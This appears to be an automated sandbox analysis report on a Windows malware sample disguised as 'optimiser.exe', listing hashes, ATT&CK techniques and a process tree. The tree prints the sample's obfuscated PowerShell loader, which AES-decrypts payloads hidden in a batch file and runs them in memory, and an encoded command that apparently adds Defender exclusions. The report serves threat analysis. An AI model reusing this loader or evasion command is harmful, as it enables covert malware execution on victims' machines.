a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5

Analysis

max time kernel
16s
max time network
16s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
12-06-2024 22:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

optimiser.exe
Size

431KB
MD5

74cb80305f51ff0585928c12be72dddd
SHA1

727a72de8f439beebf028f21d3cb58f45f99e42a
SHA256

a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5
SHA512

21775770e10ae19302d198d7c48799bc510aee0c7e92563798ba151760181facc6ba9452400cde84e3018881ec1a54ac82d1fd9b587c4bc2305af3b5793cf178
SSDEEP

12288:9uBadWfqCQi/szyz7FaFAf69ffou1R1L:9iadWfEssOzZusmPR

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2816	powershell.exe
2472	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2816	powershell.exe
2472	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2816	2780	optimiser.exe	28
PID 2780 wrote to memory of 2816	2780	optimiser.exe	28
PID 2780 wrote to memory of 2816	2780	optimiser.exe	28
PID 2780 wrote to memory of 2816	2780	optimiser.exe	28
PID 2780 wrote to memory of 2532	2780	optimiser.exe	30
PID 2780 wrote to memory of 2532	2780	optimiser.exe	30
PID 2780 wrote to memory of 2532	2780	optimiser.exe	30
PID 2780 wrote to memory of 2532	2780	optimiser.exe	30
PID 2780 wrote to memory of 2340	2780	optimiser.exe	32
PID 2780 wrote to memory of 2340	2780	optimiser.exe	32
PID 2780 wrote to memory of 2340	2780	optimiser.exe	32
PID 2780 wrote to memory of 2340	2780	optimiser.exe	32
PID 2532 wrote to memory of 2608	2532	cmd.exe	34
PID 2532 wrote to memory of 2608	2532	cmd.exe	34
PID 2532 wrote to memory of 2608	2532	cmd.exe	34
PID 2532 wrote to memory of 2608	2532	cmd.exe	34
PID 2532 wrote to memory of 2596	2532	cmd.exe	35
PID 2532 wrote to memory of 2596	2532	cmd.exe	35
PID 2532 wrote to memory of 2596	2532	cmd.exe	35
PID 2532 wrote to memory of 2596	2532	cmd.exe	35
PID 2596 wrote to memory of 2356	2596	cmd.exe	36
PID 2596 wrote to memory of 2356	2596	cmd.exe	36
PID 2596 wrote to memory of 2356	2596	cmd.exe	36
PID 2596 wrote to memory of 2356	2596	cmd.exe	36
PID 2340 wrote to memory of 2360	2340	cmd.exe	37
PID 2340 wrote to memory of 2360	2340	cmd.exe	37
PID 2340 wrote to memory of 2360	2340	cmd.exe	37
PID 2340 wrote to memory of 2360	2340	cmd.exe	37
PID 2340 wrote to memory of 2472	2340	cmd.exe	38
PID 2340 wrote to memory of 2472	2340	cmd.exe	38
PID 2340 wrote to memory of 2472	2340	cmd.exe	38
PID 2340 wrote to memory of 2472	2340	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\optimiser.exe
"C:\Users\Admin\AppData\Local\Temp\optimiser.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAaAB1ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Windows\SysWOW64\mode.com
    mode 800
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
      4⤵
      PID:2356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\sdsd.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat

Filesize
27KB

MD5
d717847f40deba47954806864cbb41e6

SHA1
870ce3a8ccbf6c8ea6b1188592319f57e9fadc52

SHA256
4a389d61282947a697f5a2629c64248059eca904b266f08a64f76341c3967f8d

SHA512
91e1156c3bb9fb33f037cd7db01a64e92778561cb6ceec35a2eeac379d2d945e6636138a054503776803590429688f77d8219589a12c598c84625e18c21b33f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.bat

Filesize
399KB

MD5
dedc70c320233bc67ceb02a9492f29d6

SHA1
d031a05a302501a50581a2338762013f60da62df

SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a

SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cd6e2cbe6f94ad70b34ff53bb146c495

SHA1
77e1029bba13b99a029de06bc6f2674fde21c65d

SHA256
e049ac8e4dd31951d440adf5c7db6db780940d08b64b4db8ecf52c6a1abf94a1

SHA512
7013702cee01f012202b0757831ba9a87134929d9181edf3c73e76f0e3e62137d4efb1970fdf63b20e5664a5192c37d2f75d0a43d085f465c44c6b136f26569d

Download Submit